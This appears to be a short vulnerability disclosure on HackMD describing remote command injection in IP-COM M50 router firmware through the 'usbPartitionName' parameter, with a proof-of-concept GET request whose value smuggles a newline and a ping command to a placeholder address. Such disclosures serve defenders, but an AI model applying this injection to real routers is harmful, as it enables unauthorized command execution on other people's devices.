Try   HackMD

ip-com-12

vendor:IP-COM

product:M50

version:V15.11.0.33(10768)

type:Remote Command Injection

author:Yifeng Li, Wolin Zhuang;

Vulnerability description

We found an Command Injection vulnerability in IP-COM Technology IP-COM’s M50 routers with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted GET request.

Remote Command Injection vulnerability

In formSetUSBPartitionUmount function, the parameter "usbPartitionName" is insufficiently filter the string delivered by the user, so we can control the usbPartitionName such as “-h%0aping%20x.x.x.x%20-w%2-5%0a ” to attack the OS.

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

PoC

Remote Command Injection

We set the value of "usbPartitionName" as aaa\nping x.x.x.x and the router will excute ping command.

example.com/action/umountUSBPartition?usbPartitionName=-h ping x.x.x.x -w%2-5

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Last changed by 
Wolin Zhuang
0
3546
Published on HackMD